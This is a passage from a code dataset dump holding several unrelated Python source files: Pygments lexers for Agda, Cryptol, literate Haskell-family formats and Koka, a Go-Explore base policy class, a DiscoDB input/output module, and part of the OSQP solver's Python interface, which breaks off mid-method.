String.Escape, 'escape'),\n (\"'\", String.Char, '#pop'),\n ],\n 'string': [\n (r'[^\\\\\"]+', String),\n (r\"\\\\\", String.Escape, 'escape'),\n ('\"', String, '#pop'),\n ],\n 'escape': [\n (r'[abfnrtv\"\\'&\\\\]', String.Escape, '#pop'),\n (r'\\^[][A-Z@^_]', String.Escape, '#pop'),\n ('|'.join(ascii), String.Escape, '#pop'),\n (r'o[0-7]+', String.Escape, '#pop'),\n (r'x[\\da-fA-F]+', String.Escape, '#pop'),\n (r'\\d+', 
String.Escape, '#pop'),\n (r'\\s+\\\\', String.Escape, '#pop')\n ],\n }\n\n\nclass AgdaLexer(RegexLexer):\n \"\"\"\n For the `Agda `_\n dependently typed functional programming language and proof assistant.\n\n .. versionadded:: 2.0\n \"\"\"\n\n name = 'Agda'\n aliases = ['agda']\n filenames = ['*.agda']\n mimetypes = ['text/x-agda']\n\n reserved = ['abstract', 'codata', 'coinductive', 'constructor', 'data',\n 'field', 'forall', 'hiding', 'in', 'inductive', 'infix',\n 'infixl', 'infixr', 'instance', 'let', 'mutual', 'open',\n 'pattern', 'postulate', 'primitive', 'private',\n 'quote', 'quoteGoal', 'quoteTerm',\n 'record', 'renaming', 'rewrite', 'syntax', 'tactic',\n 'unquote', 'unquoteDecl', 'using', 'where', 'with']\n\n tokens = {\n 'root': [\n # Declaration\n (r'^(\\s*)([^\\s(){}]+)(\\s*)(:)(\\s*)',\n bygroups(Text, Name.Function, Text, Operator.Word, Text)),\n # Comments\n (r'--(?![!#$%&*+./<=>?@^|_~:\\\\]).*?$', Comment.Single),\n (r'\\{-', Comment.Multiline, 'comment'),\n # Holes\n (r'\\{!', Comment.Directive, 'hole'),\n # Lexemes:\n # Identifiers\n (r'\\b(%s)(?!\\')\\b' % '|'.join(reserved), Keyword.Reserved),\n (r'(import|module)(\\s+)', bygroups(Keyword.Reserved, Text), 'module'),\n (r'\\b(Set|Prop)\\b', Keyword.Type),\n # Special Symbols\n (r'(\\(|\\)|\\{|\\})', Operator),\n (u'(\\\\.{1,3}|\\\\||\\u039B|\\u2200|\\u2192|:|=|->)', Operator.Word),\n # Numbers\n (r'\\d+[eE][+-]?\\d+', Number.Float),\n (r'\\d+\\.\\d+([eE][+-]?\\d+)?', Number.Float),\n (r'0[xX][\\da-fA-F]+', Number.Hex),\n (r'\\d+', Number.Integer),\n # Strings\n (r\"'\", String.Char, 'character'),\n (r'\"', String, 'string'),\n (r'[^\\s(){}]+', Text),\n (r'\\s+?', Text), # Whitespace\n ],\n 'hole': [\n # Holes\n (r'[^!{}]+', Comment.Directive),\n (r'\\{!', Comment.Directive, '#push'),\n (r'!\\}', Comment.Directive, '#pop'),\n (r'[!{}]', Comment.Directive),\n ],\n 'module': [\n (r'\\{-', Comment.Multiline, 'comment'),\n (r'[a-zA-Z][\\w.]*', Name, '#pop'),\n (r'[\\W0-9_]+', Text)\n ],\n 'comment': HaskellLexer.tokens['comment'],\n 'character': HaskellLexer.tokens['character'],\n 'string': HaskellLexer.tokens['string'],\n 'escape': HaskellLexer.tokens['escape']\n }\n\n\nclass CryptolLexer(RegexLexer):\n \"\"\"\n FIXME: A Cryptol2 lexer based on the lexemes defined in the Haskell 98 Report.\n\n .. 
versionadded:: 2.0\n \"\"\"\n name = 'Cryptol'\n aliases = ['cryptol', 'cry']\n filenames = ['*.cry']\n mimetypes = ['text/x-cryptol']\n\n reserved = ('Arith', 'Bit', 'Cmp', 'False', 'Inf', 'True', 'else',\n 'export', 'extern', 'fin', 'if', 'import', 'inf', 'lg2',\n 'max', 'min', 'module', 'newtype', 'pragma', 'property',\n 'then', 'type', 'where', 'width')\n ascii = ('NUL', 'SOH', '[SE]TX', 'EOT', 'ENQ', 'ACK',\n 'BEL', 'BS', 'HT', 'LF', 'VT', 'FF', 'CR', 'S[OI]', 'DLE',\n 'DC[1-4]', 'NAK', 'SYN', 'ETB', 'CAN',\n 'EM', 'SUB', 'ESC', '[FGRU]S', 'SP', 'DEL')\n\n tokens = {\n 'root': [\n # Whitespace:\n (r'\\s+', Text),\n # (r'--\\s*|.*$', Comment.Doc),\n (r'//.*$', Comment.Single),\n (r'/\\*', Comment.Multiline, 'comment'),\n # Lexemes:\n # Identifiers\n (r'\\bimport\\b', Keyword.Reserved, 'import'),\n (r'\\bmodule\\b', Keyword.Reserved, 'module'),\n (r'\\berror\\b', Name.Exception),\n (r'\\b(%s)(?!\\')\\b' % '|'.join(reserved), Keyword.Reserved),\n (r'^[_a-z][\\w\\']*', Name.Function),\n (r\"'?[_a-z][\\w']*\", Name),\n (r\"('')?[A-Z][\\w\\']*\", Keyword.Type),\n # Operators\n (r'\\\\(?![:!#$%&*+.\\\\/<=>?@^|~-]+)', Name.Function), # lambda operator\n (r'(<-|::|->|=>|=)(?![:!#$%&*+.\\\\/<=>?@^|~-]+)', Operator.Word), # specials\n (r':[:!#$%&*+.\\\\/<=>?@^|~-]*', Keyword.Type), # Constructor operators\n (r'[:!#$%&*+.\\\\/<=>?@^|~-]+', Operator), # Other operators\n # Numbers\n (r'\\d+[eE][+-]?\\d+', Number.Float),\n (r'\\d+\\.\\d+([eE][+-]?\\d+)?', Number.Float),\n (r'0[oO][0-7]+', Number.Oct),\n (r'0[xX][\\da-fA-F]+', Number.Hex),\n (r'\\d+', Number.Integer),\n # Character/String Literals\n (r\"'\", String.Char, 'character'),\n (r'\"', String, 'string'),\n # Special\n (r'\\[\\]', Keyword.Type),\n (r'\\(\\)', Name.Builtin),\n (r'[][(),;`{}]', Punctuation),\n ],\n 'import': [\n # Import statements\n (r'\\s+', Text),\n (r'\"', String, 'string'),\n # after \"funclist\" state\n (r'\\)', Punctuation, '#pop'),\n (r'qualified\\b', Keyword),\n # import X as Y\n (r'([A-Z][\\w.]*)(\\s+)(as)(\\s+)([A-Z][\\w.]*)',\n bygroups(Name.Namespace, Text, Keyword, Text, Name), '#pop'),\n # import X hiding (functions)\n (r'([A-Z][\\w.]*)(\\s+)(hiding)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Keyword, Text, Punctuation), 'funclist'),\n # import X (functions)\n (r'([A-Z][\\w.]*)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Punctuation), 'funclist'),\n # import X\n (r'[\\w.]+', Name.Namespace, '#pop'),\n ],\n 'module': [\n (r'\\s+', Text),\n (r'([A-Z][\\w.]*)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Punctuation), 'funclist'),\n (r'[A-Z][\\w.]*', Name.Namespace, '#pop'),\n ],\n 'funclist': [\n (r'\\s+', Text),\n (r'[A-Z]\\w*', Keyword.Type),\n (r'(_[\\w\\']+|[a-z][\\w\\']*)', Name.Function),\n # TODO: these don't match the comments in docs, remove.\n #(r'--(?![!#$%&*+./<=>?@^|_~:\\\\]).*?$', Comment.Single),\n #(r'{-', Comment.Multiline, 'comment'),\n (r',', Punctuation),\n (r'[:!#$%&*+.\\\\/<=>?@^|~-]+', Operator),\n # (HACK, but it makes sense to push two instances, believe me)\n (r'\\(', Punctuation, ('funclist', 'funclist')),\n (r'\\)', Punctuation, '#pop:2'),\n ],\n 'comment': [\n # Multiline Comments\n (r'[^/*]+', Comment.Multiline),\n (r'/\\*', Comment.Multiline, '#push'),\n (r'\\*/', Comment.Multiline, '#pop'),\n (r'[*/]', Comment.Multiline),\n ],\n 'character': [\n # Allows multi-chars, incorrectly.\n (r\"[^\\\\']'\", String.Char, '#pop'),\n (r\"\\\\\", String.Escape, 'escape'),\n (\"'\", String.Char, '#pop'),\n ],\n 'string': [\n (r'[^\\\\\"]+', String),\n (r\"\\\\\", String.Escape, 'escape'),\n 
('\"', String, '#pop'),\n ],\n 'escape': [\n (r'[abfnrtv\"\\'&\\\\]', String.Escape, '#pop'),\n (r'\\^[][A-Z@^_]', String.Escape, '#pop'),\n ('|'.join(ascii), String.Escape, '#pop'),\n (r'o[0-7]+', String.Escape, '#pop'),\n (r'x[\\da-fA-F]+', String.Escape, '#pop'),\n (r'\\d+', String.Escape, '#pop'),\n (r'\\s+\\\\', String.Escape, '#pop'),\n ],\n }\n\n EXTRA_KEYWORDS = set(('join', 'split', 'reverse', 'transpose', 'width',\n 'length', 'tail', '<<', '>>', '<<<', '>>>', 'const',\n 'reg', 'par', 'seq', 'ASSERT', 'undefined', 'error',\n 'trace'))\n\n def get_tokens_unprocessed(self, text):\n stack = ['root']\n for index, token, value in \\\n RegexLexer.get_tokens_unprocessed(self, text, stack):\n if token is Name and value in self.EXTRA_KEYWORDS:\n yield index, Name.Builtin, value\n else:\n yield index, token, value\n\n\nclass LiterateLexer(Lexer):\n \"\"\"\n Base class for lexers of literate file formats based on LaTeX or Bird-style\n (prefixing each code line with \">\").\n\n Additional options accepted:\n\n `litstyle`\n If given, must be ``\"bird\"`` or ``\"latex\"``. If not given, the style\n is autodetected: if the first non-whitespace character in the source\n is a backslash or percent character, LaTeX is assumed, else Bird.\n \"\"\"\n\n bird_re = re.compile(r'(>[ \\t]*)(.*\\n)')\n\n def __init__(self, baselexer, **options):\n self.baselexer = baselexer\n Lexer.__init__(self, **options)\n\n def get_tokens_unprocessed(self, text):\n style = self.options.get('litstyle')\n if style is None:\n style = (text.lstrip()[0:1] in '%\\\\') and 'latex' or 'bird'\n\n code = ''\n insertions = []\n if style == 'bird':\n # bird-style\n for match in line_re.finditer(text):\n line = match.group()\n m = self.bird_re.match(line)\n if m:\n insertions.append((len(code),\n [(0, Comment.Special, m.group(1))]))\n code += m.group(2)\n else:\n insertions.append((len(code), [(0, Text, line)]))\n else:\n # latex-style\n from pygments.lexers.markup import TexLexer\n lxlexer = TexLexer(**self.options)\n codelines = 0\n latex = ''\n for match in line_re.finditer(text):\n line = match.group()\n if codelines:\n if line.lstrip().startswith('\\\\end{code}'):\n codelines = 0\n latex += line\n else:\n code += line\n elif line.lstrip().startswith('\\\\begin{code}'):\n codelines = 1\n latex += line\n insertions.append((len(code),\n list(lxlexer.get_tokens_unprocessed(latex))))\n latex = ''\n else:\n latex += line\n insertions.append((len(code),\n list(lxlexer.get_tokens_unprocessed(latex))))\n for item in do_insertions(insertions, self.baselexer.get_tokens_unprocessed(code)):\n yield item\n\n\nclass LiterateHaskellLexer(LiterateLexer):\n \"\"\"\n For Literate Haskell (Bird-style or LaTeX) source.\n\n Additional options accepted:\n\n `litstyle`\n If given, must be ``\"bird\"`` or ``\"latex\"``. If not given, the style\n is autodetected: if the first non-whitespace character in the source\n is a backslash or percent character, LaTeX is assumed, else Bird.\n\n .. versionadded:: 0.9\n \"\"\"\n name = 'Literate Haskell'\n aliases = ['lhs', 'literate-haskell', 'lhaskell']\n filenames = ['*.lhs']\n mimetypes = ['text/x-literate-haskell']\n\n def __init__(self, **options):\n hslexer = HaskellLexer(**options)\n LiterateLexer.__init__(self, hslexer, **options)\n\n\nclass LiterateIdrisLexer(LiterateLexer):\n \"\"\"\n For Literate Idris (Bird-style or LaTeX) source.\n\n Additional options accepted:\n\n `litstyle`\n If given, must be ``\"bird\"`` or ``\"latex\"``. 
If not given, the style\n is autodetected: if the first non-whitespace character in the source\n is a backslash or percent character, LaTeX is assumed, else Bird.\n\n .. versionadded:: 2.0\n \"\"\"\n name = 'Literate Idris'\n aliases = ['lidr', 'literate-idris', 'lidris']\n filenames = ['*.lidr']\n mimetypes = ['text/x-literate-idris']\n\n def __init__(self, **options):\n hslexer = IdrisLexer(**options)\n LiterateLexer.__init__(self, hslexer, **options)\n\n\nclass LiterateAgdaLexer(LiterateLexer):\n \"\"\"\n For Literate Agda source.\n\n Additional options accepted:\n\n `litstyle`\n If given, must be ``\"bird\"`` or ``\"latex\"``. If not given, the style\n is autodetected: if the first non-whitespace character in the source\n is a backslash or percent character, LaTeX is assumed, else Bird.\n\n .. versionadded:: 2.0\n \"\"\"\n name = 'Literate Agda'\n aliases = ['lagda', 'literate-agda']\n filenames = ['*.lagda']\n mimetypes = ['text/x-literate-agda']\n\n def __init__(self, **options):\n agdalexer = AgdaLexer(**options)\n LiterateLexer.__init__(self, agdalexer, litstyle='latex', **options)\n\n\nclass LiterateCryptolLexer(LiterateLexer):\n \"\"\"\n For Literate Cryptol (Bird-style or LaTeX) source.\n\n Additional options accepted:\n\n `litstyle`\n If given, must be ``\"bird\"`` or ``\"latex\"``. If not given, the style\n is autodetected: if the first non-whitespace character in the source\n is a backslash or percent character, LaTeX is assumed, else Bird.\n\n .. versionadded:: 2.0\n \"\"\"\n name = 'Literate Cryptol'\n aliases = ['lcry', 'literate-cryptol', 'lcryptol']\n filenames = ['*.lcry']\n mimetypes = ['text/x-literate-cryptol']\n\n def __init__(self, **options):\n crylexer = CryptolLexer(**options)\n LiterateLexer.__init__(self, crylexer, **options)\n\n\nclass KokaLexer(RegexLexer):\n \"\"\"\n Lexer for the `Koka `_\n language.\n\n .. versionadded:: 1.6\n \"\"\"\n\n name = 'Koka'\n aliases = ['koka']\n filenames = ['*.kk', '*.kki']\n mimetypes = ['text/x-koka']\n\n keywords = [\n 'infix', 'infixr', 'infixl',\n 'type', 'cotype', 'rectype', 'alias',\n 'struct', 'con',\n 'fun', 'function', 'val', 'var',\n 'external',\n 'if', 'then', 'else', 'elif', 'return', 'match',\n 'private', 'public', 'private',\n 'module', 'import', 'as',\n 'include', 'inline',\n 'rec',\n 'try', 'yield', 'enum',\n 'interface', 'instance',\n ]\n\n # keywords that are followed by a type\n typeStartKeywords = [\n 'type', 'cotype', 'rectype', 'alias', 'struct', 'enum',\n ]\n\n # keywords valid in a type\n typekeywords = [\n 'forall', 'exists', 'some', 'with',\n ]\n\n # builtin names and special names\n builtin = [\n 'for', 'while', 'repeat',\n 'foreach', 'foreach-indexed',\n 'error', 'catch', 'finally',\n 'cs', 'js', 'file', 'ref', 'assigned',\n ]\n\n # symbols that can be in an operator\n symbols = r'[$%&*+@!/\\\\^~=.:\\-?|<>]+'\n\n # symbol boundary: an operator keyword should not be followed by any of these\n sboundary = '(?!'+symbols+')'\n\n # name boundary: a keyword should not be followed by any of these\n boundary = '(?![\\w/])'\n\n # koka token abstractions\n tokenType = Name.Attribute\n tokenTypeDef = Name.Class\n tokenConstructor = Generic.Emph\n\n # main lexer\n tokens = {\n 'root': [\n include('whitespace'),\n\n # go into type mode\n (r'::?' 
+ sboundary, tokenType, 'type'),\n (r'(alias)(\\s+)([a-z]\\w*)?', bygroups(Keyword, Text, tokenTypeDef),\n 'alias-type'),\n (r'(struct)(\\s+)([a-z]\\w*)?', bygroups(Keyword, Text, tokenTypeDef),\n 'struct-type'),\n ((r'(%s)' % '|'.join(typeStartKeywords)) +\n r'(\\s+)([a-z]\\w*)?', bygroups(Keyword, Text, tokenTypeDef),\n 'type'),\n\n # special sequences of tokens (we use ?: for non-capturing group as\n # required by 'bygroups')\n (r'(module)(\\s+)(interface\\s+)?((?:[a-z]\\w*/)*[a-z]\\w*)',\n bygroups(Keyword, Text, Keyword, Name.Namespace)),\n (r'(import)(\\s+)((?:[a-z]\\w*/)*[a-z]\\w*)'\n r'(?:(\\s*)(=)(\\s*)((?:qualified\\s*)?)'\n r'((?:[a-z]\\w*/)*[a-z]\\w*))?',\n bygroups(Keyword, Text, Name.Namespace, Text, Keyword, Text,\n Keyword, Name.Namespace)),\n\n (r'(^(?:(?:public|private)\\s*)?(?:function|fun|val))'\n r'(\\s+)([a-z]\\w*|\\((?:' + symbols + r'|/)\\))',\n bygroups(Keyword, Text, Name.Function)),\n (r'(^(?:(?:public|private)\\s*)?external)(\\s+)(inline\\s+)?'\n r'([a-z]\\w*|\\((?:' + symbols + r'|/)\\))',\n bygroups(Keyword, Text, Keyword, Name.Function)),\n\n # keywords\n (r'(%s)' % '|'.join(typekeywords) + boundary, Keyword.Type),\n (r'(%s)' % '|'.join(keywords) + boundary, Keyword),\n (r'(%s)' % '|'.join(builtin) + boundary, Keyword.Pseudo),\n (r'::?|:=|\\->|[=.]' + sboundary, Keyword),\n\n # names\n (r'((?:[a-z]\\w*/)*)([A-Z]\\w*)',\n bygroups(Name.Namespace, tokenConstructor)),\n (r'((?:[a-z]\\w*/)*)([a-z]\\w*)', bygroups(Name.Namespace, Name)),\n (r'((?:[a-z]\\w*/)*)(\\((?:' + symbols + r'|/)\\))',\n bygroups(Name.Namespace, Name)),\n (r'_\\w*', Name.Variable),\n\n # literal string\n (r'@\"', String.Double, 'litstring'),\n\n # operators\n (symbols + \"|/(?![*/])\", Operator),\n (r'`', Operator),\n (r'[{}()\\[\\];,]', Punctuation),\n\n # literals. 
No check for literal characters with len > 1\n (r'[0-9]+\\.[0-9]+([eE][\\-+]?[0-9]+)?', Number.Float),\n (r'0[xX][0-9a-fA-F]+', Number.Hex),\n (r'[0-9]+', Number.Integer),\n\n (r\"'\", String.Char, 'char'),\n (r'\"', String.Double, 'string'),\n ],\n\n # type started by alias\n 'alias-type': [\n (r'=', Keyword),\n include('type')\n ],\n\n # type started by struct\n 'struct-type': [\n (r'(?=\\((?!,*\\)))', Punctuation, '#pop'),\n include('type')\n ],\n\n # type started by colon\n 'type': [\n (r'[(\\[<]', tokenType, 'type-nested'),\n include('type-content')\n ],\n\n # type nested in brackets: can contain parameters, comma etc.\n 'type-nested': [\n (r'[)\\]>]', tokenType, '#pop'),\n (r'[(\\[<]', tokenType, 'type-nested'),\n (r',', tokenType),\n (r'([a-z]\\w*)(\\s*)(:)(?!:)',\n bygroups(Name, Text, tokenType)), # parameter name\n include('type-content')\n ],\n\n # shared contents of a type\n 'type-content': [\n include('whitespace'),\n\n # keywords\n (r'(%s)' % '|'.join(typekeywords) + boundary, Keyword),\n (r'(?=((%s)' % '|'.join(keywords) + boundary + '))',\n Keyword, '#pop'), # need to match because names overlap...\n\n # kinds\n (r'[EPHVX]' + boundary, tokenType),\n\n # type names\n (r'[a-z][0-9]*(?![\\w/])', tokenType),\n (r'_\\w*', tokenType.Variable), # Generic.Emph\n (r'((?:[a-z]\\w*/)*)([A-Z]\\w*)',\n bygroups(Name.Namespace, tokenType)),\n (r'((?:[a-z]\\w*/)*)([a-z]\\w+)',\n bygroups(Name.Namespace, tokenType)),\n\n # type keyword operators\n (r'::|->|[.:|]', tokenType),\n\n # catchall\n default('#pop')\n ],\n\n # comments and literals\n 'whitespace': [\n (r'\\n\\s*#.*$', Comment.Preproc),\n (r'\\s+', Text),\n (r'/\\*', Comment.Multiline, 'comment'),\n (r'//.*$', Comment.Single)\n ],\n 'comment': [\n (r'[^/*]+', Comment.Multiline),\n (r'/\\*', Comment.Multiline, '#push'),\n (r'\\*/', Comment.Multiline, '#pop'),\n (r'[*/]', Comment.Multiline),\n ],\n 'litstring': [\n (r'[^\"]+', String.Double),\n (r'\"\"', String.Escape),\n (r'\"', String.Double, '#pop'),\n ],\n 'string': [\n (r'[^\\\\\"\\n]+', String.Double),\n include('escape-sequence'),\n (r'[\"\\n]', String.Double, '#pop'),\n ],\n 'char': [\n (r'[^\\\\\\'\\n]+', String.Char),\n include('escape-sequence'),\n (r'[\\'\\n]', String.Char, '#pop'),\n ],\n 'escape-sequence': [\n (r'\\\\[nrt\\\\\"\\']', String.Escape),\n (r'\\\\x[0-9a-fA-F]{2}', String.Escape),\n (r'\\\\u[0-9a-fA-F]{4}', String.Escape),\n # Yes, \\U literals are 6 hex digits.\n (r'\\\\U[0-9a-fA-F]{6}', String.Escape)\n ]\n }\n"} {"ext": "py", "sha": "1a2f22e3695171a9affdff58faba065f0b5853c3", "content": "import typing\n\nimport gym\n\non_state_change_type = typing.Callable[[\n gym.Space, # State\n gym.Space, # Action\n float, # Reward\n gym.Space, # New state\n bool, # Is done\n typing.Optional[object], # Info\n], type(None)]\n\n\ndef _noop_function(*args, **kwargs):\n pass\n\n\nclass BasePolicy(object):\n \"\"\"A class that represents an exploration policy for Go-Explore\"\"\"\n\n def __init__(self, environment: gym.Env):\n \"\"\"Create exploration policy.\n\n :param environment: OpenAI Gym environment that should be explored\n \"\"\"\n self.environment = environment\n self._on_action = _noop_function\n\n @property\n def on_action(self):\n return self._on_action\n\n @on_action.setter\n def on_action(self, new_on_action: on_state_change_type):\n self._on_action = new_on_action\n\n def _environment_act(self, current_state: gym.Space, action: gym.Space):\n result = self.environment.step(action)\n new_state, reward, done, info = result\n self._on_action(current_state, action, 
reward, new_state, done, info)\n return result\n\n def explore(self, current_state: gym.Space):\n \"\"\"Explore from current state.\n\n This method should explore from current_state using the exploration\n policy. It can be e.g. random actions, exploration through curiosity,\n etc.\n\n The environment should be in current_state in order for this method to\n work properly.\n\n :param current_state: Current state of the environment\n :returns Latest tuple from env.step call (or None if not explored)\n \"\"\"\n raise NotImplementedError\n"} {"ext": "py", "sha": "1a2f23047ab44cd2c40947ce2e5c48fea538fe5c", "content": "from disco import util\nfrom discodb import DiscoDB, Q\nfrom disco.worker.task_io import task_output_stream\n\ndef Open(url, task=None):\n if task:\n disco_data = task.disco_data\n ddfs_data = task.ddfs_data\n else:\n from disco.settings import DiscoSettings\n settings = DiscoSettings()\n disco_data = settings['DISCO_DATA']\n ddfs_data = settings['DDFS_DATA']\n scheme, netloc, rest = util.urlsplit(url)\n path, rest = rest.split('!', 1) if '!' in rest else (rest, '')\n discodb = DiscoDB.load(open(util.localize(path, disco_data=disco_data,\n ddfs_data=ddfs_data)))\n\n if rest:\n method_name, arg = rest.split('/', 1) if '/' in rest else (rest, None)\n method = getattr(discodb, method_name)\n if method_name in ('metaquery', 'query'):\n return method(Q.urlscan(arg))\n return method(*filter(None, arg))\n return discodb\n\ndef input_stream(fd, size, url, params):\n return Open(url, task=globals().get('Task')), size, url\n\nclass DiscoDBOutput(object):\n def __init__(self, stream, params):\n from discodb import DiscoDBConstructor\n self.discodb_constructor = DiscoDBConstructor()\n self.stream = stream\n self.params = params\n self.path = stream.path\n\n def add(self, key, val):\n self.discodb_constructor.add(key, val)\n\n def close(self):\n def flags():\n return dict((flag, getattr(self.params, flag))\n for flag in ('unique_items', 'disable_compression')\n if hasattr(self.params, flag))\n self.discodb_constructor.finalize(**flags()).dump(self.stream)\n\ndef discodb_output(stream, partition, url, params):\n return DiscoDBOutput(stream, params), 'discodb:{0}'.format(url.split(':', 1)[1])\n\ndiscodb_stream = (task_output_stream, discodb_output)\n"} {"ext": "py", "sha": "1a2f23b7b527dd66060e8951d37926856c5dc26e", "content": "\"\"\"\nPython interface module for OSQP solver v0.6.2.post5\n\"\"\"\nfrom __future__ import print_function\nfrom builtins import object\nimport osqp._osqp as _osqp # Internal low level module\nimport numpy as np\nimport scipy.sparse as spa\nfrom warnings import warn\nfrom platform import system\nimport osqp.codegen as cg\nimport osqp.utils as utils\nimport sys\nimport qdldl\n\n\nclass OSQP(object):\n def __init__(self):\n self._model = _osqp.OSQP()\n\n def version(self):\n return self._model.version()\n\n def setup(self, P=None, q=None, A=None, l=None, u=None, **settings):\n \"\"\"\n Setup OSQP solver problem of the form\n\n minimize 1/2 x' * P * x + q' * x\n subject to l <= A * x <= u\n\n solver settings can be specified as additional keyword arguments\n \"\"\"\n # TODO(bart): this will be unnecessary when the derivative will be in C\n self._derivative_cache = {'P': P, 'q': q, 'A': A, 'l': l, 'u': u}\n\n unpacked_data, settings = utils.prepare_data(P, q, A, l, u, **settings)\n self._model.setup(*unpacked_data, **settings)\n\n def update(self, q=None, l=None, u=None,\n Px=None, Px_idx=np.array([]), Ax=None, Ax_idx=np.array([])):\n \"\"\"\n Update OSQP problem arguments\n 
\"\"\"\n\n # get problem dimensions\n (n, m) = self._model.dimensions()\n\n # check consistency of the input arguments\n if q is not None and len(q) != n:\n raise ValueError(\"q must have length n\")\n if l is not None:\n if not isinstance(l, np.ndarray):\n raise TypeError(\"l must be numpy.ndarray, not %s\" %\n type(l).__name__)\n elif len(l) != m:\n raise ValueError(\"l must have length m\")\n # Convert values to -OSQP_INFTY\n l = np.maximum(l, -_osqp.constant('OSQP_INFTY'))\n if u is not None:\n if not isinstance(u, np.ndarray):\n raise TypeError(\"u must be numpy.ndarray, not %s\" %\n type(u).__name__)\n elif len(u) != m:\n raise ValueError(\"u must have length m\")\n # Convert values to OSQP_INFTY\n u = np.minimum(u, _osqp.constant('OSQP_INFTY'))\n if Ax is None:\n if len(Ax_idx) > 0:\n raise ValueError(\"Vector Ax has not been specified\")\n else:\n if len(Ax_idx) > 0 and len(Ax) != len(Ax_idx):\n raise ValueError(\"Ax and Ax_idx must have the same lengths\")\n if Px is None:\n if len(Px_idx) > 0:\n raise ValueError(\"Vector Px has not been specified\")\n else:\n if len(Px_idx) > 0 and len(Px) != len(Px_idx):\n raise ValueError(\"Px and Px_idx must have the same lengths\")\n if q is None and l is None and u is None and Px is None and Ax is None:\n raise ValueError(\"No updatable data has been specified\")\n\n # update linear cost\n if q is not None:\n self._model.update_lin_cost(q)\n\n # update lower bound\n if l is not None and u is None:\n self._model.update_lower_bound(l)\n\n # update upper bound\n if u is not None and l is None:\n self._model.update_upper_bound(u)\n\n # update bounds\n if l is not None and u is not None:\n self._model.update_bounds(l, u)\n\n # update matrix P\n if Px is not None and Ax is None:\n self._model.update_P(Px, Px_idx, len(Px))\n\n # update matrix A\n if Ax is not None and Px is None:\n self._model.update_A(Ax, Ax_idx, len(Ax))\n\n # update matrices P and A\n if Px is not None and Ax is not None:\n self._model.update_P_A(Px, Px_idx, len(Px), Ax, Ax_idx, len(Ax))\n\n\n # TODO(bart): this will be unnecessary when the derivative will be in C\n # update problem data in self._derivative_cache\n if q is not None:\n self._derivative_cache[\"q\"] = q\n\n if l is not None:\n self._derivative_cache[\"l\"] = l\n\n if u is not None:\n self._derivative_cache[\"u\"] = u\n\n if Px is not None:\n if Px_idx.size == 0:\n self._derivative_cache[\"P\"].data = Px\n else:\n self._derivative_cache[\"P\"].data[Px_idx] = Px\n\n if Ax is not None:\n if Ax_idx.size == 0:\n self._derivative_cache[\"A\"].data = Ax\n else:\n self._derivative_cache[\"A\"].data[Ax_idx] = Ax\n\n # delete results from self._derivative_cache to prohibit\n # taking the derivative of unsolved problems\n if \"results\" in self._derivative_cache.keys():\n del self._derivative_cache[\"results\"]\n\n def update_settings(self, **kwargs):\n \"\"\"\n Update OSQP solver settings\n\n It is possible to change: 'max_iter', 'eps_abs', 'eps_rel',\n 'eps_prim_inf', 'eps_dual_inf', 'rho'\n 'alpha', 'delta', 'polish',\n 'polish_refine_iter',\n 'verbose', 'scaled_termination',\n 'check_termination', 'time_limit',\n \"\"\"\n\n # get arguments\n max_iter = kwargs.pop('max_iter', None)\n eps_abs = kwargs.pop('eps_abs', None)\n eps_rel = kwargs.pop('eps_rel', None)\n eps_prim_inf = kwargs.pop('eps_prim_inf', None)\n eps_dual_inf = kwargs.pop('eps_dual_inf', None)\n rho = kwargs.pop('rho', None)\n alpha = kwargs.pop('alpha', None)\n delta = kwargs.pop('delta', None)\n polish = kwargs.pop('polish', None)\n polish_refine_iter = 
kwargs.pop('polish_refine_iter', None)\n verbose = kwargs.pop('verbose', None)\n scaled_termination = kwargs.pop('scaled_termination', None)\n check_termination = kwargs.pop('check_termination', None)\n warm_start = kwargs.pop('warm_start', None)\n time_limit = kwargs.pop('time_limit', None)\n\n # update them\n if max_iter is not None:\n self._model.update_max_iter(max_iter)\n\n if eps_abs is not None:\n self._model.update_eps_abs(eps_abs)\n\n if eps_rel is not None:\n self._model.update_eps_rel(eps_rel)\n\n if eps_prim_inf is not None:\n self._model.update_eps_prim_inf(eps_prim_inf)\n\n if eps_dual_inf is not None:\n self._model.update_eps_dual_inf(eps_dual_inf)\n\n if rho is not None:\n self._model.update_rho(rho)\n\n if alpha is not None:\n self._model.update_alpha(alpha)\n\n if delta is not None:\n self._model.update_delta(delta)\n\n if polish is not None:\n self._model.update_polish(polish)\n\n if polish_refine_iter is not None:\n self._model.update_polish_refine_iter(polish_refine_iter)\n\n if verbose is not None:\n self._model.update_verbose(verbose)\n\n if scaled_termination is not None:\n self._model.update_scaled_termination(scaled_termination)\n\n if check_termination is not None:\n self._model.update_check_termination(check_termination)\n\n if warm_start is not None:\n self._model.update_warm_start(warm_start)\n\n if time_limit is not None:\n self._model.update_time_limit(time_limit)\n\n if max_iter is None and \\\n eps_abs is None and \\\n eps_rel is None and \\\n eps_prim_inf is None and \\\n eps_dual_inf is None and \\\n rho is None and \\\n alpha is None and \\\n delta is None and \\\n polish is None and \\\n polish_refine_iter is None and \\\n verbose is None and \\\n scaled_termination is None and \\\n check_termination is None and \\\n warm_start is None:\n raise ValueError(\"No updatable settings has been specified!\")\n\n def solve(self):\n \"\"\"\n Solve QP Problem\n \"\"\"\n # Solve QP\n results = self._model.solve()\n\n # TODO(bart): this will be unnecessary when the derivative will be in C\n self._derivative_cache['results'] = results\n\n return results\n\n def warm_start(self, x=None, y=None):\n \"\"\"\n Warm start primal or dual variables\n \"\"\"\n # get problem dimensions\n (n, m) = self._model.dimensions()\n\n if x is not None:\n if len(x) != n:\n raise ValueError(\"Wrong dimension for variable x\")\n\n if y is None:\n self._model.warm_start_x(x)\n\n if y is not None:\n if len(y) != m:\n raise ValueError(\"Wrong dimension for variable y\")\n\n if x is None:\n self._model.warm_start_y(y)\n\n if x is not None and y is not None:\n self._model.warm_start(x, y)\n\n if x is None and y is None:\n raise ValueError(\"Unrecognized fields\")\n\n def codegen(self, folder, project_type='', parameters='vectors',\n python_ext_name='emosqp', force_rewrite=False, compile_python_ext=True,\n FLOAT=False, LONG=True):\n \"\"\"\n Generate embeddable C code for the problem\n \"\"\"\n\n # Check parameters arguments\n if parameters == 'vectors':\n embedded = 1\n elif parameters == 'matrices':\n embedded = 2\n else:\n raise ValueError(\"Unknown value of 'parameters' argument.\")\n\n # Set float and long flags\n if FLOAT:\n float_flag = 'ON'\n else:\n float_flag = 'OFF'\n if LONG:\n long_flag = 'ON'\n else:\n long_flag = 'OFF'\n\n # Check project_type 